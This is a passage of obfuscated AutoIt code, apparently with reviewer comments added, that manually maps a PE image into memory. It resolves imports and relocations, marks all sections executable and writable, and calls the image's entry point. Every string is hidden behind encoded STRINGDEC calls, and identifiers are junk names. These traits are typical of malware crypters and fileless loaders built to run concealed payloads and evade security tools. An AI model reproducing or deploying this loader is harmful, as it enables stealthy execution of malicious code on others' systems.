12,-71,-23,-6,-5,-7,-5,-37,0,-11,2,12,6,19,4,-4,-17,-12,-7,1,-14,-4,10,-38")&STRINGDEC(
"hfnduqnrlbroybqslnaqoogukwuauv","15,9,4,0,-85,-36,-5,-4,3,16,-31,6,-23,17,8,0,8,-9,12,-27,-10,3,12,-12,4,-9,-58")&STRINGDEC("nqpaymclyzlckbvmscnwxywpjhkamg","-10,6,-1,17,-21,-77,-12,-3,-11,-71,-58,-13,-6,16,-3,-4,-4,11,-24,-22,-12,-4,-18,-53")&STRINGDEC("faxgbzxuuvjkpasfhvbxxknkonfdel","-2,22,-9,11,2,-90,-37,-12,5,-17,-27,-5,-39,12,-18,1,-3,-59")&STRINGDEC("gnobcrxmwoyuussmjbbpxzefcjmlve","-3,9,0,16,1,-82,-37,-4,3,-10,-42,-15,-45,-14,-18,-9,-5,16,17,-53")&STRINGDEC("ieyxrrajxyexgteibukaitgbzhpdkv","-5,18,-10,-6,-14,-82,-30,-2,-19,-22,6,-37,14,-7,-42")&STRINGDEC("cdjqrrkrxphgwfhemgenaxowhhhhmw","20,11,8,-13,-82,-31,10,-16,-5,9,11,13,-18,7,-45")&STRINGDEC("haihznoatxwzjhtxfddiskisnhgxyj","15,14,9,-4,-90,-42,-3,11,-49,-16,-22,-8,-9,-5,0,-19,12,5,15,11,-10,-8,10,-56")&STRINGDEC("fxdtghgofffvfipskrarjwglsumils","15,-15,10,0,-49,-52,-71,-28,3,20,-1,-39,0,-22,4,-18,-8,-7,-15,-13,9,-18,11,10,-14,-58")&STRINGDEC("vtrecaeijykmcbhuwuatuvngilhwbv","-1,-11,-4,15,-45,-45,-69,-22,-1,1,-6,-30,3,-15,12,-20,-20,-10,-30,-5,-8,-9,-5,13,-46")&STRINGDEC("iaovcgmbsqfyywjjupuzspzasjjwmm","12,8,-1,-2,-45,-51,-77,-15,-10,9,-1,-42,-19,-47,-5,-9,-5,-30,-16,-7,-14,2,-4,4,-56")&STRINGDEC("zldnfbilropcisfeguxfrysgszpxxg","-5,-3,10,6,-48,-46,-73,-25,-9,11,-11,-20,-3,-43,-1,-4,9,-50,-9,7,-5,-16,1,-44")&STRINGDEC("sxefhvsraekvuxabluizrsvvnrtxgg","-15,-1,10,12,-4,-86,-39,-3,0,-1,-6,-4,-47,-12,0,5,7,-58")&STRINGDEC("otffztxddrgbujlpiyxifduzuypdjq","-11,3,9,12,-22,-84,-42,17,9,-16,-2,16,-38,-4,-26,6,-8,-56,-10,-5,-19,5,5,-21,-2"),$PPOINTER)
; 112 = size of the PE32+ optional header up to (not including) the data directories.
$PPOINTER+=112
ELSE
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(3,0,0)
ENDIF
; Optional-header fields needed later: SizeOfImage, AddressOfEntryPoint and
; the preferred ImageBase (used for the relocation delta).
LOCAL $ISIZEOFIMAGE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("zsegnrzltluwowczdwtnhmfmrwgesz","-39,-10,21,-2,-31,-12,-49,1,-19,-5,-16"))
LOCAL $IENTRYPOINT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("ecaylgmvcgunqzdwlwowleyvvmqubq","-36,1,3,-7,-7,12,6,-39,3,-34,-7,6,1,-1,-20,-8,-3,-9,5"))
LOCAL $POPTIONALHEADERIMAGEBASE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("piklccodxnprxusmndogiunpucofod","-39,4,-10,-5,2,-33,-14,15,-19"))
; Walk the 16 data directories (8 bytes each): skip export (+8), read the
; import directory, skip three (+24), read the base-relocation directory,
; skip the remaining ten (+40 +40).
$PPOINTER+=8
LOCAL $TIMAGE_DIRECTORY_ENTRY_IMPORT=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
LOCAL $PADDRESSIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
LOCAL $ISIZEIMPORT=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_IMPORT,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
$PPOINTER+=8
$PPOINTER+=24
LOCAL $TIMAGE_DIRECTORY_ENTRY_BASERELOC=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("rohrkgdmncfrxlmcewguxyjlhjcbyb","-14,8,7,0,-7,-71,-14,-4,4,17,15,-17,-12,-43,-9,1,13,-18,12,-2,-61,-89,-6,11,7,8,1,-66,-38,7,8,-10"),$PPOINTER)
LOCAL $PADDRESSNEWBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
LOCAL $ISIZEBASERELOC=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_DIRECTORY_ENTRY_BASERELOC,STRINGDEC("htimftjivdahmcggkgdubendfivfhq","-21,-11,17,-8"))
$PPOINTER+=8
$PPOINTER+=40
$PPOINTER+=40
; Reserve + commit SizeOfImage bytes at an OS-chosen address (base 0), read/
; write only.  $BCLEANLOAD stores the result of UNMAPVIEWOFSECTION(0) on the
; current process; its purpose is not clear from the code and it only gates
; the _WinAPI_FreeLibrary at the end.  NOTE(review): the allocation result
; is not checked, so a failed allocation would continue with base 0.
LOCAL $PBASEADDRESS=0
LOCAL $BCLEANLOAD=$HOOKEXPLOITKERNELBYPASSROOTEXPLOIT($PBASEADDRESS)
$PBASEADDRESS=$BYPASSKERNELROOTADMINISTRATION($PBASEADDRESS,$ISIZEOFIMAGE,$MEM_RESERVE+$MEM_COMMIT,$PAGE_READWRITE)
; Copy SizeOfHeaders bytes of the original headers to the new base; error 6
; if the protection change fails.  NOTE(review): the failure path calls
; _WinAPI_FreeLibrary on a VirtualAlloc'd region, which is not a module handle.
LOCAL $PHEADERSNEW=$HOOKROOTKERNELROOTHOOK($TIMAGE_DOS_HEADER)
LOCAL $IOPTIONALHEADERSIZEOFHEADERS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_OPTIONAL_HEADER,STRINGDEC("uajndgscxoaqvmpmlewkyvswvbncum","-34,8,16,-9,-21,-1,-43,2,-23,-11,4,1,-3"))
$BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS,$IOPTIONALHEADERSIZEOFHEADERS,$PAGE_READWRITE)
IF @ERROR THEN
$KERNELROOTROOTKERNELKERNEL($PBASEADDRESS)
RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(6,0,0)
ENDIF
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PBASEADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IOPTIONALHEADERSIZEOFHEADERS&"]",$PHEADERSNEW),1))
; Per-section loop; each IMAGE_SECTION_HEADER is 40 bytes (see the += 40s).
LOCAL $TIMAGE_SECTION_HEADER
LOCAL $ISIZEOFRAWDATA,$PPOINTERTORAWDATA
LOCAL $IVIRTUALSIZE,$IVIRTUALADDRESS
LOCAL $TIMPRAW,$TRELOCRAW
FOR $I=1 TO $INUMBEROFSECTIONS
$TIMAGE_SECTION_HEADER=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("mojpoyssdxtpuzqpcnsiwelefhzgya","-10,-7,-9,2,-79,-43,-18,-6,1,-29,-60,-19,-58")&STRINGDEC("vbldanmbhcsltynkaortgbgkjuimps","-18,21,3,14,3,-78,-23,7,10,17,2,-11,-8,-38,-5,15,4,-52")&STRINGDEC("kkvvvluofzqkzuepcoybcytubbiggv","-7,12,-7,-4,-18,-76,-31,-6,12,-6,4,-10,-14,-52,-1,-12,15,-10,-6,17,-40")&STRINGDEC("qetrjgnlxlvegjkdznybdrcuijzsol","-13,18,-5,0,-6,-71,-27,-3,2,-7,-39,1,-21,-9,12,-32,-25,6,-24,-39")&STRINGDEC("blvsrzcrailshptfaqyyeetseetdbz","2,11,-7,-1,-14,-90,-19,-3,8,5,8,-14,10,-28,-5,-20,0,6,-53,-24,15,-4,-57")&STRINGDEC("tqkctmpbsvhhkdkgmqnibxhpkatykb","-16,6,4,15,-16,-77,-32,13,-10,-8,12,-3,7,-16,4,-21,-8,-5,1,-6,-1,-4,1,-1,3,18,-57")&STRINGDEC("nhnevjsryrvozfdrhezcxeomkkmhus","-10,15,1,13,-18,-74,-35,-3,-16,-4,-2,-10,-8,-18,11,-38,1,9,-21,11,-3,8,-13,-8,7,8,-50")&STRINGDEC("rqejsmymxcjnxkzbsbxujapidccihv","5,-2,13,-6,-83,-31,-4,0,-22,2,8,-31,-18,-25,-21,10,-4,1,-23,-1,-1,14,-2,10,-41")&STRINGDEC("sgnndtmmzqymlnyidyqlpxkocogaza","4,8,4,-10,-68,-38,8,0,-24,-12,-7,-30,-6,-34,-16,5,1,-11,4,1,-14,-19,7,4,-40")&STRINGDEC("hupkjmgzcrxevtxtowwoteiqwftdex","-4,2,-1,7,-6,-77,-36,-18,-2,0,-23,-2,-2,-15,-6,-11,4,-3,-14,-12,-1"),$PPOINTER)
$ISIZEOFRAWDATA=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("lohkljtmkwobrarxhbfwcbacdanqnx","-25,-6,18,-6,-29,-4,-34,-12,12,-51,-14,18,-17"))
$PPOINTERTORAWDATA=$PHEADERSNEW+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("xttkphmeylgmqkmwftqcvvtehxhceq","-40,-5,-11,3,4,-3,5,-17,-10,-26,-6,10,-45,-10,7,-22"))
$IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
$IVIRTUALSIZE=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_SECTION_HEADER,STRINGDEC("bolwjztsooyqtkwojkfjcewunjrbrl","-12,-6,6,-3,11,-25,-8,-32,-6,11,-20"))
; Never copy more raw bytes than the section's virtual size.
IF $IVIRTUALSIZE AND $IVIRTUALSIZE<$ISIZEOFRAWDATA THEN $ISIZEOFRAWDATA=$IVIRTUALSIZE
; Every section is made PAGE_EXECUTE_READWRITE regardless of its
; characteristics; a failed protection change silently skips the section.
$BYPASSADMINISTRATIONEXPLOITBYPASS($PBASEADDRESS+$IVIRTUALADDRESS,$IVIRTUALSIZE,$PAGE_EXECUTE_READWRITE)
IF @ERROR THEN
$PPOINTER+=40
CONTINUELOOP
ENDIF
; Zero-fill VirtualSize bytes (the source is a freshly created, empty struct),
; then copy the raw section data over it.
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$IVIRTUALSIZE&"]"),1))
IF $ISIZEOFRAWDATA THEN
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PBASEADDRESS+$IVIRTUALADDRESS),1,$KERNELBYPASSROOTADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEOFRAWDATA&"]",$PPOINTERTORAWDATA),1))
ENDIF
; If the import directory lies inside this section, resolve imports from the
; raw data right away (FIXIMPORTS); if the relocation directory does, keep a
; struct over it for the FIXRELOC call after the loop.
IF $IVIRTUALADDRESS<=$PADDRESSIMPORT AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSIMPORT THEN
$TIMPRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEIMPORT&"]",$PPOINTERTORAWDATA+($PADDRESSIMPORT-$IVIRTUALADDRESS))
$BYPASSKERNELEXPLOITKERNEL($TIMPRAW,$PBASEADDRESS)
ENDIF
IF $IVIRTUALADDRESS<=$PADDRESSNEWBASERELOC AND $IVIRTUALADDRESS+$ISIZEOFRAWDATA>$PADDRESSNEWBASERELOC THEN
$TRELOCRAW=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("iyfyemhyqmldhzjikiefukojbszgwz","-7,0,14,-20,-10")&$ISIZEBASERELOC&"]",$PPOINTERTORAWDATA+($PADDRESSNEWBASERELOC-$IVIRTUALADDRESS))
ENDIF
$PPOINTER+=40
NEXT
; Apply base relocations (delta = actual base - preferred ImageBase) when a
; relocation directory exists; $IMAGIC=523 selects the 64-bit entry type.
IF $PADDRESSNEWBASERELOC AND $ISIZEBASERELOC THEN $ADMINISTRATIONKERNELBYPASSROOTROOTADMINISTRATION($TRELOCRAW,$PBASEADDRESS,$POPTIONALHEADERIMAGEBASE,$IMAGIC=523)
; Call the entry point through DllCallAddress with (base, 1, 0).  The type
; strings are obfuscated; the argument values match the DllMain(hinstDLL,
; fdwReason = DLL_PROCESS_ATTACH, lpReserved) convention.
LOCAL $PENTRYFUNC=$PBASEADDRESS+$IENTRYPOINT
IF $IENTRYPOINT THEN $ADMINISTRATIONADMINISTRATIONBYPASSHOOK(STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),$PENTRYFUNC,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PBASEADDRESS,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),1,STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),0)
; NOTE(review): _WinAPI_FreeLibrary on a VirtualAlloc'd base is not a valid
; release of this region; no RETURN follows, so the base is never handed back.
IF $BCLEANLOAD THEN $KERNELEXPLOITADMINISTRATIONROOTBYPASSADMINISTRATION($PBASEADDRESS)
ENDFUNC
; Applies base relocations to a manually mapped image.  $TDATA is a byte
; struct over the raw relocation directory (built in DLLFROMMEMORY),
; $PADDRESSNEW the actual base, $PADDRESSOLD the preferred ImageBase and
; $FIMAGEX64 selects the 64-bit relocation type.  Always returns 1.
FUNC FIXRELOC($TDATA,$PADDRESSNEW,$PADDRESSOLD,$FIMAGEX64)
LOCAL $IDELTA=$PADDRESSNEW-$PADDRESSOLD
LOCAL $ISIZE=$KERNELROOTKERNELHOOKKERNELROOT($TDATA)
LOCAL $PDATA=$HOOKROOTKERNELROOTHOOK($TDATA)
LOCAL $TIMAGE_BASE_RELOCATION,$IRELATIVEMOVE
LOCAL $IVIRTUALADDRESS,$ISIZEOFBLOCK,$INUMBEROFENTRIES
LOCAL $TENRIES,$IDATA,$TADDRESS
; Relocation type that gets patched: 3 (IMAGE_REL_BASED_HIGHLOW) for PE32,
; 10 (IMAGE_REL_BASED_DIR64) for PE32+.  Entries of any other type are ignored.
LOCAL $IFLAG=3+7*$FIMAGEX64
; $IRELATIVEMOVE is declared without a value, so the first comparison treats
; it as 0.  NOTE(review): a block whose SizeOfBlock reads 0 never advances
; $IRELATIVEMOVE, so a malformed relocation table would loop forever.
WHILE $IRELATIVEMOVE<$ISIZE
; IMAGE_BASE_RELOCATION block: an 8-byte header (VirtualAddress, SizeOfBlock)
; followed by (SizeOfBlock - 8) / 2 WORD entries.
$TIMAGE_BASE_RELOCATION=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("lwjrdmzzfbhfvidpgcrfuusyhqgqwo","-8,0,5,0,0,-77,-36,-17,12,18,13,-5,-10,-40,0,-12,11,2,1,13,-58,-85,-15,-2,7,1,-3,-81,-36,-6,14,-18,-27,-12,-34,-1,-11,-23,5"),$PDATA+$IRELATIVEMOVE)
$IVIRTUALADDRESS=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("vaxsqldqdfzpvxgvsyjbhlaivzeixa","-32,8,-6,1,4,-11,8,-48,0,-2,-8,-11,-3,-5"))
$ISIZEOFBLOCK=$KERNELBYPASSROOTADMINISTRATION($TIMAGE_BASE_RELOCATION,STRINGDEC("bnuwrciljwllofmmhxrxtcxcwgidkq","-15,-5,5,-18,-35,3,-39,0,5,-20,-1"))
$INUMBEROFENTRIES=($ISIZEOFBLOCK-8)/2
$TENRIES=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ljdrmcjigcsrmjeayaoxiftpaygyrv","11,5,14,-14,-18")&$INUMBEROFENTRIES&"]",$HOOKROOTKERNELROOTHOOK($TIMAGE_BASE_RELOCATION)+8)
FOR $I=1 TO $INUMBEROFENTRIES
$IDATA=$KERNELBYPASSROOTADMINISTRATION($TENRIES,1,$I)
; Entry layout: high 4 bits (BitShift by 12) = type, low 12 bits (BitAND
; 4095) = offset within the page at VirtualAddress.
IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($IDATA,12)=$IFLAG THEN
$TADDRESS=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESSNEW+$IVIRTUALADDRESS+$BYPASSBYPASSHOOKEXPLOIT($IDATA,4095))
; Add the load delta to the pointer-sized value at the target address.
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($TADDRESS,1,$KERNELBYPASSROOTADMINISTRATION($TADDRESS,1)+$IDELTA)
ENDIF
NEXT
$IRELATIVEMOVE+=$ISIZEOFBLOCK
WEND
RETURN 1
ENDFUNC
; Resolves the import table of a manually mapped image.  $TDATA is a byte
; struct over the raw import directory, $HINSTANCE the new base address.
; For every import descriptor the named module is loaded with
; _WinAPI_LoadLibrary and each thunk slot is overwritten with the address
; returned by GETPROCADDRESS.  Always returns 1.
; NOTE(review): neither the LoadLibrary handle nor the GETPROCADDRESS result
; is checked; a failed lookup writes 0 into the thunk slot and continues.
; NOTE(review): module names are taken verbatim from the image being mapped,
; so the normal DLL search order applies to whatever the image names.
FUNC FIXIMPORTS($TDATA,$HINSTANCE)
LOCAL $PIMPORTDIRECTORY=$HOOKROOTKERNELROOTHOOK($TDATA)
LOCAL $HMODULE,$PFUNCNAME,$TFUNCNAME,$SFUNCNAME,$PFUNCADDRESS
LOCAL $TIMAGE_IMPORT_MODULE_DIRECTORY,$PMODULENAME,$TMODULENAME
LOCAL $TBUFFEROFFSET2,$IBUFFEROFFSET2
LOCAL $IINITIALOFFSET,$IINITIALOFFSET2,$IOFFSET
; Pointer size (4 or 8) obtained from a struct of the obfuscated pointer
; type - the same STRINGDEC string used wherever a pointer type is needed.
LOCAL CONST $IPTRSIZE=$KERNELROOTKERNELHOOKKERNELROOT($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4")))
; Descriptor loop; each IMAGE_IMPORT_DESCRIPTOR is 20 bytes (see += 20
; below).  The loop ends at the first descriptor whose checked field is 0,
; i.e. the null terminator entry.
WHILE 1
$TIMAGE_IMPORT_MODULE_DIRECTORY=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("oslxljafhlcqevhnveycpapujzmbxp","-11,4,3,-6,-8,-74,-15,-16,-39,-29,15,-8,2,-13,6,-13,-10,-31,-16,15,3,19,-28,-13,11,-12,-2,-39")&STRINGDEC("fgdaygtgtzkeiogftjplkmhulfitfm","-2,16,11,17,-21,-71,-32,2,-7,-21,-39,-4,11,-10,-20,14,-19,3,0,-49")&STRINGDEC("dhbrrjgfaqtelpmlwzkkhrxzhyhysq","0,15,13,0,-14,-74,-33,9,17,6,-19,13,-8,-11,5,-41,-15,-25,-2,3,-45")&STRINGDEC("dilcwosqkyuaqkznzozwybrpzcyodc","0,14,3,15,-19,-79,-33,-27,-42,-44,-6,3,4,1,-21,-32,-25,-2,-21,-60")&STRINGDEC("usmbngezbsbjfvccnqokanpjizqujz","-17,4,2,16,-10,-71,-19,-36,-33,-45,7,8,13,-2,-15,5,7,-3,-4"),$PIMPORTDIRECTORY)
IF NOT $KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))THEN EXITLOOP
; Module name: an RVA (added to $HINSTANCE) to an ANSI string whose length is
; measured with _WinAPI_StringLenA; the module is then loaded by that name.
$PMODULENAME=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17"))
$TMODULENAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("upjquvutslafzbgfjxkhknbxlzazrp","-18,-8,-9,1,-85,-40,-20,-7,-14,-17")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PMODULENAME)&"]",$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("uantbqllttuevibcqdtrmnwucvxdfb","-35,-11,-45,-39,13,-13,9,0,-15,-38,-20,8,-17")))
$HMODULE=$BYPASSEXPLOITEXPLOITROOTEXPLOITBYPASS($KERNELBYPASSROOTADMINISTRATION($TMODULENAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12")))
; Two thunk arrays: $IINITIALOFFSET is the one written to, $IINITIALOFFSET2
; the one read from.  If the second RVA is 0 (equals $HINSTANCE after adding
; the base) the first array serves both purposes.
$IINITIALOFFSET=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("hexycwgtfbcwsreqoojrsmjddzzoxj","-22,-15,-55,-51,6,-5,12,0,-18,6,18,-9,-8"))
$IINITIALOFFSET2=$HINSTANCE+$KERNELBYPASSROOTADMINISTRATION($TIMAGE_IMPORT_MODULE_DIRECTORY,STRINGDEC("zfbhtwtfudtxfnayqiivdgxbknheos","-40,-16,-33,-25,-2,-14,-13,3,-7,-3,-8,-50,3,4,18,-5,-29,-1,12,-8,7"))
IF $IINITIALOFFSET2=$HINSTANCE THEN $IINITIALOFFSET2=$IINITIALOFFSET
$IOFFSET=0
; Thunk loop, one pointer-sized entry at a time, terminated by a 0 entry.
WHILE 1
$TBUFFEROFFSET2=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET2+$IOFFSET)
$IBUFFEROFFSET2=$KERNELBYPASSROOTADMINISTRATION($TBUFFEROFFSET2,1)
IF NOT $IBUFFEROFFSET2 THEN EXITLOOP
; The top bit of the thunk (tested on its most significant byte via
; BinaryMid + BitShift 7) marks an import by ordinal; the ordinal is the
; low 16 bits (BitAND 65535).
IF $ROOTBYPASSADMINISTRATIONADMINISTRATION($KERNELEXPLOITADMINISTRATIONROOTROOT($IBUFFEROFFSET2,$IPTRSIZE,1),7)THEN
$PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$BYPASSBYPASSHOOKEXPLOIT($IBUFFEROFFSET2,65535))
ELSE
; Otherwise the thunk is an RVA to a 2-byte hint followed by the
; NUL-terminated function name (hence the +2).
$PFUNCNAME=$HINSTANCE+$IBUFFEROFFSET2+2
$TFUNCNAME=$ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("ztupaktkcocqtjwswsimusgwiiaevm","-3,-5,-3,-12,-65,-28,-2,-7,6,-1,-2,-5,-57,-74,-20,-11,-22,-1,-73,-31,-20,-6,-2,-28")&$ROOTKERNELROOTROOTADMINISTRATIONBYPASS($PFUNCNAME)&"]",$HINSTANCE+$IBUFFEROFFSET2)
$SFUNCNAME=$KERNELBYPASSROOTADMINISTRATION($TFUNCNAME,STRINGDEC("ocmqkssqolnvxuhrhmkzgjdofxgnvv","-33,-2,0,-12"))
$PFUNCADDRESS=$BYPASSHOOKADMINISTRATIONHOOKBYPASSKERNEL($HMODULE,$SFUNCNAME)
ENDIF
; Write the resolved address into the thunk slot the image will call through.
$ADMINISTRATIONKERNELHOOKKERNELADMINISTRATION($ROOTBYPASSBYPASSKERNELHOOKADMINISTRATION(STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$IINITIALOFFSET+$IOFFSET),1,$PFUNCADDRESS)
$IOFFSET+=$IPTRSIZE
WEND
$PIMPORTDIRECTORY+=20
WEND
RETURN 1
ENDFUNC
; DllCall wrapper; library name, return type and function name are obfuscated
; with STRINGDEC (the wrapper's own name suggests the native
; NtUnmapViewOfSection, which is not verifiable here).  Passes the current
; process handle (_WinAPI_GetCurrentProcess) and $PADDRESS.
; Returns True on success, False with @error = 1 when the DllCall fails or
; the returned value is non-zero - a "0 means success" convention.
; DLLFROMMEMORY calls this once with $PADDRESS = 0 before allocating.
FUNC UNMAPVIEWOFSECTION($PADDRESS)
LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("lolaswlneqglatvujvwqviroebtdfh","2,5,-8,11,-7,-73,-8,-2,7"),STRINGDEC("pzsmwgeaptrhqhifwxjgngsprkjntw","-7,-12,1"),STRINGDEC("egwadzchaebonrunjtdzissolfqgmo","-23,13,-34,13,9,-25,13,-18,8,0,21,-32,-8,-31,-16,-11,10,-11,11,-12"),STRINGDEC("wvyhizikrnukotjwuqbnvlyvoqlxdb","-15,-21,-11,-4,3,-21"),$BYPASSHOOKHOOKHOOKKERNELHOOK(),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS)
IF @ERROR OR $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,FALSE )
RETURN TRUE
ENDFUNC
; DllCall wrapper (obfuscated library, function and type strings) that changes
; the protection of $ISIZE bytes at $PADDRESS to $IPROTECTION.  The trailing
; argument initialised to 0 is presumably the old-protection output
; parameter; its value is discarded.
; Returns 1 on success, 0 with @error = 1 when the DllCall fails or the
; function returns FALSE.  Callers in DLLFROMMEMORY test @error, not the
; return value.
FUNC VIRTUALPROTECT($PADDRESS,$ISIZE,$IPROTECTION)
LOCAL $ACALL=$ADMINISTRATIONROOTEXPLOITHOOKADMINISTRATIONHOOK(STRINGDEC("gisqrnanonrphwezrnlerrcpslnegz","4,-4,-1,-3,-13,-2,-46,-60,-65,-10,-6,-4"),STRINGDEC("bgerenbiyscuvxftpthytojojwggvx","0,8,10,-6"),STRINGDEC("wpxbildbjcxtjlduknwzcanprgheeu","-33,-7,-6,18,12,-11,8,-18,8,12,-4,-15,-7,8"),STRINGDEC("whvjqzlpfkorqulxjmxmbcnireihzm","-7,12,-4"),$PADDRESS,STRINGDEC("qquzgqwwlawbxandwwcglmgrcbifhj","-13,6,-6,-8,-3,-18,-7,-3,6"),$ISIZE,STRINGDEC("fjmrgpoktxdxalfupypesalaixldpw","-2,13,2,0,-3"),$IPROTECTION,STRINGDEC("nnpgmnrtuodmqfsmzcfvlmzjmztrro","-10,9,-1,11,-9,-68"),0)
IF @ERROR OR NOT $ACALL[0]THEN RETURN $ROOTKERNELHOOKHOOKBYPASSROOT(1,0,0)
RETURN 1
ENDFUNC
; DllCall wrapper that resolves an export of $HMODULE.  $VNAME is either a
; function name or, when IsNumber($VNAME) is true, an ordinal; the parameter
; type string passed to DllCall is chosen accordingly (both strings are
; obfuscated with STRINGDEC).
; Returns the resolved address, or 0 with @error = 1 when the DllCall fails
; or the lookup returns 0.  FIXIMPORTS writes this result into the thunk
; slot without checking @error.
FUNC GETPROCADDRESS($HMODULE,$VNAME)
LOCAL $STYPE=STRINGDEC("zdacatdoylubvdmymbssbhfdsgsgol","-7,16,17")
IF $EXPLOITEXPLOITKERNELHOOKKERNELBYPASS($VNAME)THEN $STYPE=STRINGDEC("rygvobzahsfsgyffoyrxsigagjtisp","5,-10,11,-18")
